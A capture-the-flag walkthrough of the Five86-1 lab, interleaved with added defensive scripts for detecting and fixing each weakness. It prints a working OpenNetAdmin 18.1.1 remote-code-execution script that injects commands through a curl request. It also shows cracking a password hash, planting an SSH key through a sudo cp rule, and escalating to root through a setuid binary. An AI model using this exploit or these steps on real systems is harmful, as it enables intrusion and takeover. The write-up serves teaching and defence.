Description
Five86-1 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
DC and Five86 Series Challenges
First, locate the target machine on the network
nmap -sP 192.168.37.1/24
nmap -p 1-65535 -A 192.168.37.147
Three ports are found, all open; start with port 80
HINT: A dictionary attack will probably fail. I recommend using hashcat, a bruteforce attack, and a character set of aethrt for this 8 letter password. If you follow the above hint, it shouldn't take you all that long. Good luck. :-)
The page on port 10000
Directory scanning shows several accessible directories
robots.txt points to the ona directory
/robots.txt
Visiting ona, there is nothing usable yet
It shows the site runs the Open Net Admin (OpenNetAdmin) framework
opennetadmin
In msf, searchsploit opennetadmin
cp /usr/share/exploitdb/exploits/php/webapps/47691.sh shell.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Run the script directly
bash shell.sh http://192.168.37.147/ona/
The script's command prompt does not echo some error output back
Next step: information gathering
First, see which files www-data owns
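The detection-side counterpart of the script above, as an added example that is not part of this write-up or of OpenNetAdmin: the injected command travels in the POST body, not the URL, so a web-server access log will not show it. A body inspector (for a WAF rule or a request-logging proxy) can flag shell metacharacters inside the `ip=>` argument of the tooltips/ping call, which should only ever carry an address. The request bodies below are constructed; the malicious one mirrors the parameter layout of the exploit script.

```python
"""Inspect POST bodies sent to OpenNetAdmin's xajax handler for shell
metacharacters smuggled into the 'ip=>' argument of the ping tooltip.

Added example for this write-up; not OpenNetAdmin code. BENIGN and
MALICIOUS are constructed sample bodies."""
from urllib.parse import unquote_plus

# Characters that have no business in an IP-address argument.
SHELL_META = set(";|&`$\n")


def parse_body(body: str) -> dict:
    """Minimal form-body parser; repeated keys are collected into lists.
    Split on '&' only, so ';' inside a value survives for inspection."""
    params = {}
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def inspect_body(body: str) -> dict:
    """Return a verdict dict for one request body to the xajax endpoint."""
    params = parse_body(body)
    args = params.get("xajaxargs[]", [])
    reasons = []
    if params.get("xajax") == ["window_submit"] and "tooltips" in args:
        for arg in args:
            if arg.startswith("ip=>"):
                value = arg[len("ip=>"):]
                bad = sorted(SHELL_META & set(value))
                if bad:
                    reasons.append(f"shell metacharacters {bad!r} in ip argument")
    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed sample bodies: a normal ping tooltip, and one carrying a command.
BENIGN = ("xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
          "&xajaxargs[]=ip%3D%3E192.168.37.1&xajaxargs[]=ping")
MALICIOUS = ("xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
             "&xajaxargs[]=ip%3D%3E;echo+%22BEGIN%22;whoami;echo+%22END%22"
             "&xajaxargs[]=ping")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, inspect_body(body))
```

The real fix is upgrading OpenNetAdmin past v18.1.1, the version named in the exploit header; the inspector above is only a compensating control that gives you a log line while the upgrade is pending.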
$ find / -type f -user www-data
Everything under /proc after that is useless, and so are the log files; look at the .htaccess file instead
$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
This restricts the reports directory to valid users, with the user database in /var/www/.htpasswd
Read it
$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
We get a username, a password hash, and a password hint
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
First, use crunch to generate a plaintext wordlist from the hinted character set
crunch 10 10 aefhrt > five86-1_password.txt
Put douglas's hash in its own file
$ cat five86-1_hashpasswd.txt
Run the crack
john --wordlist=five86-1_password.txt five86-1_hashpasswd.txt
The password is recovered
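Why this step was cheap, as an added example from the defender's side (not code from the write-up): Apache's `$apr1$` scheme is iterated MD5, which GPU crackers handle quickly, and the hint in the file collapses the search to a six-letter alphabet over ten positions. The audit script below parses an htpasswd file, classifies each hash scheme, reports comment lines (which here leaked the hint), and computes the hinted keyspace. The douglas entry is the one on the page; the second entry is a constructed placeholder.

```python
"""Audit an Apache .htpasswd file for weak hash schemes, leaked comments,
and estimate the search space a disclosed hint leaves.

Added example for this write-up; not part of the Five86-1 lab or of Apache.
The douglas line is the page's; the 'alice' line is a constructed placeholder."""
import re

# Prefixes Apache's htpasswd(1) can produce, with whether they are weak today.
SCHEMES = [
    ("$2y$", "bcrypt", False),
    ("$2a$", "bcrypt", False),
    ("$apr1$", "apr1-md5", True),   # iterated MD5: fast on GPUs
    ("{SHA}", "sha1", True),        # unsalted SHA-1
]


def classify_hash(hashed: str):
    """Return (scheme, weak) for one htpasswd hash field."""
    for prefix, name, weak in SCHEMES:
        if hashed.startswith(prefix):
            return name, weak
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hashed):
        return "crypt-des", True    # traditional DES crypt, 8-char limit
    return "plaintext", True


def audit_htpasswd(text: str):
    """Parse htpasswd content.
    Returns (findings, comments): findings is a list of (user, scheme, weak);
    comments lists '#' lines, which should not exist in a credential file."""
    findings, comments = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            comments.append(line)
            continue
        user, _, hashed = line.partition(":")
        scheme, weak = classify_hash(hashed)
        findings.append((user, scheme, weak))
    return findings, comments


def keyspace(charset_size: int, length: int) -> int:
    """Number of candidates for a fixed-length password over a known charset."""
    return charset_size ** length


SAMPLE = """douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
alice:$2y$05$CONSTRUCTEDplaceholderNotARealBcryptHash0000000000000000
"""

if __name__ == "__main__":
    findings, comments = audit_htpasswd(SAMPLE)
    for user, scheme, weak in findings:
        print(f"{user}: {scheme}{' (WEAK)' if weak else ''}")
    print("comment lines present (possible hint leakage):", len(comments))
    # 6 letters over 10 positions: about 60 million candidates
    print("hinted keyspace:", keyspace(len("aefhrt"), 10))
```

Two takeaways for the file's owner: regenerate entries with `htpasswd -B` (bcrypt) rather than the default MD5 scheme, and keep the file outside any directory the web application user can read, since here www-data could `cat` it straight from the RCE shell.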
Port 22 was shown open earlier
First check sudo privileges
We can see (jen) NOPASSWD: /bin/cp
Look for something usable: the home directory has a .ssh directory containing douglas's public and private key files
We already know we can run cp as jen
So copy the public key file into jen's home
.ssh/authorized_keys is the file that controls key-based login; putting the public key into it allows logging in without a password
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
The copy succeeds; log in directly
ssh jen@192.168.37.147
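How a sudo reviewer would have caught this rule, as an added example that is not part of the write-up or of sudo: any sudo grant of a file-writing tool such as cp lets the caller create files as the run-as user, and `~/.ssh/authorized_keys` is just one of many files where that becomes a login. The script parses `sudo -l` output, extracts each rule's run-as user, tags and commands, and flags file-writing binaries and unrestricted grants. The sample output is constructed around the single rule the page shows.

```python
"""Audit `sudo -l` output for rules that let a user write files as another
account, which is what turned a cp permission into an SSH login here.

Added example for this write-up; not part of the lab or of sudo.
SAMPLE_SUDO_L is constructed around the rule shown on the page."""
import os
import re

# Binaries that can copy or write arbitrary files as the run-as user.
FILE_WRITERS = {"cp", "mv", "tee", "dd", "install", "rsync", "vi", "vim", "nano"}

# Matches rule lines such as "(jen) NOPASSWD: /bin/cp" or "(root) /usr/bin/apt, /bin/ls".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> list:
    """Extract run-as user, tags and command list from each rule line."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": m.group("runas"), "tags": tags, "cmds": cmds})
    return rules


def audit_rules(rules: list) -> list:
    """Return findings for rules a reviewer should question."""
    findings = []
    for rule in rules:
        for cmd in rule["cmds"]:
            reasons = []
            if cmd == "ALL":
                reasons.append("unrestricted command")
            else:
                name = os.path.basename(cmd.split()[0])
                if name in FILE_WRITERS:
                    reasons.append(f"{name} can write arbitrary files as {rule['runas']}")
            if reasons and "NOPASSWD" in rule["tags"]:
                reasons.append("no password required")
            if reasons:
                findings.append({"runas": rule["runas"], "cmd": cmd, "reasons": reasons})
    return findings


# Constructed `sudo -l` output containing the rule from the page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
"""

if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({f['runas']}) {f['cmd']}: " + "; ".join(f["reasons"]))
```

If a cross-user copy is genuinely needed, grant a wrapper script with a fixed source and destination instead of cp itself, and watch auth.log for sudo lines whose `COMMAND=` is a file-writing tool with a `USER=` other than the caller.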
There is new mail, which may contain something; mail is usually kept in /var/spool/mail
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
moss's password is Fire!Fire!
moss@five86-1:~$ ls
moss@five86-1:~$ ls -a
. .. .bash_history .games
moss@five86-1:~$
The home directory contains a hidden directory and a hidden file of no use
moss@five86-1:~/.games$ ls -la
total 28
drwx------ 2 moss moss 4096 Jan 1 2020 .
drwx------ 3 moss moss 4096 Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss 14 Jan 1 2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss 15 Jan 1 2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss 25 Jan 1 2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan 1 2020 upyourgame
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 worms -> /usr/games/worms
moss@five86-1:~/.games$
One entry, upyourgame, is a setuid binary owned by root
Running it
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? yes
Could you please repeat that? no
Nope, you'll need to enter that again. no
You entered: No. Is this correct? no
We appear to have a problem? Do we have a problem? no
Made in Britain.
# whoami
root
# cd /
# ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old webmin-setup.out
# cd root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
#
Flag obtained
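The final step hinged on a setuid-root binary sitting in a user's home directory, where no package manager put it. As an added example that is not part of the write-up, the script below does the periodic check a host-hardening baseline would run: it recognises the setuid bit both in `ls -l` output (the `s` in the owner-execute position, as in the listing above) and in raw stat modes, walks a tree for setuid/setgid regular files, and marks anything not on an allowlist of expected paths. The listing lines used as input are taken from the page; the allowlist is a constructed placeholder.

```python
"""Locate setuid/setgid executables and flag those outside an allowlist.

Added example for this write-up; not part of the lab. LS_SAMPLE is the
listing from the page; EXPECTED_SETUID is a constructed placeholder."""
import os
import stat


def ls_line_is_setuid_root(line: str):
    """Parse one `ls -l` line. True for a regular file with the setuid bit
    whose owner is root; None for lines that are not file entries."""
    fields = line.split()
    if len(fields) < 9:
        return None
    perms, owner = fields[0], fields[2]
    # perms[3] is the owner-execute slot: 's' = setuid+exec, 'S' = setuid only
    return perms[0] == "-" and perms[3] in "sS" and owner == "root"


def classify_mode(mode: int, uid: int) -> list:
    """Flags for one inode from its st_mode and st_uid."""
    flags = []
    if not stat.S_ISREG(mode):
        return flags
    if mode & stat.S_ISUID:
        flags.append("setuid-root" if uid == 0 else "setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    return flags


def find_privileged(root: str, allowlist=frozenset()) -> list:
    """Walk a directory tree (not following symlinks) and report every
    setuid/setgid regular file, noting whether it is expected."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            flags = classify_mode(st.st_mode, st.st_uid)
            if flags:
                findings.append({"path": path, "flags": flags,
                                 "expected": path in allowlist})
    return findings


# Listing lines from the page (subset).
LS_SAMPLE = """\
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan 1 2020 upyourgame
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 worms -> /usr/games/worms
"""

# Constructed placeholder: in practice, build this from the package manager.
EXPECTED_SETUID = frozenset({"/usr/bin/sudo", "/usr/bin/passwd"})

if __name__ == "__main__":
    for line in LS_SAMPLE.splitlines():
        if ls_line_is_setuid_root(line):
            print("setuid-root in listing:", line.split()[-1])
    for f in find_privileged("/usr/bin", EXPECTED_SETUID):
        print(f["path"], f["flags"], "expected" if f["expected"] else "UNEXPECTED")
```

On Debian-family systems the allowlist can be derived by checking each hit with `dpkg -S`; a setuid-root file no package claims, like this one under `~/.games`, is the finding that matters. Mounting home directories with `nosuid` removes the whole class.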